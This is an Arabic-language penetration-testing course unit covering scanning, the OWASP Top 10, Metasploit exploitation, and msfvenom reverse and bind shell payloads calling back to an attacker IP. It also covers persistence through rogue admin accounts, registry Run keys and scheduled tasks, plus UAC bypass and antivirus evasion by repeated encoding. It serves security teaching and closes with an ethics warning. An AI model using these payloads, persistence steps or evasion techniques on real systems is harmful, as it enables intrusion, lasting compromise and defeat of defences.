الوحدة الرابعة: اختراق الأنظمة واستغلال الثغرات

ضمن مقرر الأمن السيبراني - قسم اختبار الاختراق

Metasploit Exploitation OWASP Top 10

مقدمة الوحدة

في هذه الوحدة، سنتعلم كيفية تحليل الثغرات الأمنية واستغلالها للوصول غير المصرح به إلى الأنظمة، مع التركيز على أدوات وتطبيقات عملية تستخدم في عمليات اختبار الاختراق. سنغطي أنواع الثغرات الشائعة، أدوات الاستغلال مثل Metasploit، وإنشاء واستغلال Payloads، بالإضافة إلى تقنيات الحفاظ على الوصول وتجاوز وسائل الحماية.

الوقت المقدر لإكمال هذه الوحدة: 10 ساعات

فحص الثغرات

فحص المنافذ والخدمات

فحص المنافذ هو الخطوة الأولى لاكتشاف الثغرات المحتملة في الأنظمة المستهدفة. يتم ذلك من خلال:

Nmap

أداة مسح الشبكات واكتشاف الخدمات

nmap -sV -O -p- target_ip
Nessus

ماسح ضوئي متقدم للثغرات

# أداة واجهة رسومية
Nikto

ماسح ضوئي لثغرات الويب

nikto -h http://target.com

فحص تطبيقات الويب

أنواع الفحوصات
  • فحص البنية التحتية (السيرفرات، الإعدادات)
  • فحص التطبيق (المدخلات، الصلاحيات)
  • فحص المصدر المفتوح (الكود المصدري)
  • فحص المصدر المغلق (السلوك أثناء التشغيل)
أدوات إضافية
  • Burp Suite - لفحص تطبيقات الويب
  • OWASP ZAP - أداة فحص أوتوماتيكية
  • SQLmap - لكشف ثغرات SQL Injection
  • WPScan - لفحص مواقع ووردبريس

استغلال الثغرات

ثغرات OWASP Top 10

OWASP Top 10 هي قائمة بأكثر ثغرات تطبيقات الويب خطورة والتي ينشرها مشروع OWASP:

1
حقن (Injection)

مثل SQL Injection، OS Command Injection

2
تخريب مصادقة الهوية

ضعف في أنظمة المصادقة وإدارة الجلسات

3
تعرض البيانات الحساسة

عدم تشفير البيانات المهمة بشكل صحيح

4
XML External Entities (XXE)

ثغرات في معالجة ملفات XML

5
تخريب التحكم في الوصول

ضعف في أنظمة الصلاحيات والتحكم

هذه مجرد أمثلة من القائمة، يمكنك الاطلاع على القائمة الكاملة في موقع OWASP الرسمي

استغلال الثغرات باستخدام Metasploit

بدء تشغيل Metasploit
msfconsole
البحث عن الثغرات
search exploit_name
تحديد الثغرة وتهيئتها
use exploit/path/to/exploit
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_ip
exploit
التحكم بالجهاز المستهدف
# بعد الحصول على جلسة Meterpreter
sysinfo # معلومات النظام
shell # دخول إلى سطر الأوامر
upload file # رفع ملف
download file # تنزيل ملف
screenshot # التقاط لقطة للشاشة

إنشاء Payloads والحفاظ على الوصول

أنواع Payloads

Reverse Shell

يتصل بالهجوم بدلاً من انتظار اتصال منه

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe
Bind Shell

يفتح منفذ على الجهاز المستهدف وينتظر اتصال

msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > payload.exe
Staged Payload

ينفذ على مراحل لتجنب الاكتشاف

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 > payload.exe

الحفاظ على الوصول (Persistence)

التقنية الوصف أمر Meterpreter
إضافة مستخدم إنشاء حساب مستخدم جديد مع صلاحيات إدارية shell -> net user hacker Password123 /add
خدمة النظام إنشاء خدمة تعمل عند بدء التشغيل persistence -X -i 60 -p 4444 -r your_ip
مفتاح التسجيل إضافة إلى Run أو Startup في التسجيل reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v malware -d 'C:\\malware.exe'
مهمة مجدولة إنشاء مهمة مجدولة تنفذ Payload بشكل دوري shell -> schtasks /create /tn "Update" /tr "C:\\malware.exe" /sc hourly /mo 1

تجاوز وسائل الحماية

تجاوز UAC (User Account Control)
  • استغلال ثغرات في ملفات Microsoft Signed Binaries
  • استخدام تقنيات DLL Hijacking
  • استغلال مسار Windows Registry
  • استخدام أدوات مثل bypassuac في Metasploit
use exploit/windows/local/bypassuac
set SESSION 1
exploit
تجاوز مضادات الفيروسات (AV Bypass)
  • تشفير Payload باستخدام Encoders
  • تقسيم Payload إلى أجزاء صغيرة
  • استخدام تقنيات Process Injection
  • استخدام أدوات مثل Veil-Evasion أو Shellter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe
نصائح لتجاوز الحماية
  • استخدم Payloads مخصصة للبيئة المستهدفة
  • غير التوقيع الرقمي للملفات التنفيذية
  • استخدم تقنيات Living Off The Land (LOLBAS)
  • اختبر Payload على أنظمة مماثلة قبل التنفيذ

اعتبارات أخلاقية

تحذير هام

جميع التقنيات والأدوات المذكورة في هذه الوحدة هي لأغراض تعليمية واختبار اختراق قانوني فقط. استخدام هذه التقنيات على أنظمة دون إذن صريح يعتبر جريمة إلكترونية يعاقب عليها القانون. كن محترفًا أخلاقيًا واستخدم هذه المعرفة لتحسين الأمن السيبراني وليس لانتهاكه.

اتفاقية اختبار الاختراق

قبل البدء بأي اختبار اختراق، تأكد من:

  • الحصول على إذن كتابي من مالك النظام
  • تحديد نطاق الاختبار بوضوح
  • الاتفاق على التوقيت المناسب للاختبار
  • تحديد قنوات الاتصال في حالات الطوارئ
أخلاقيات المهنة

التزم بمبادئ القرصنة الأخلاقية:

  • احترم الخصوصية
  • لا تلحق ضررًا بالأنظمة
  • حافظ على سرية المعلومات
  • ابلغ عن الثغرات بطريقة مسؤولة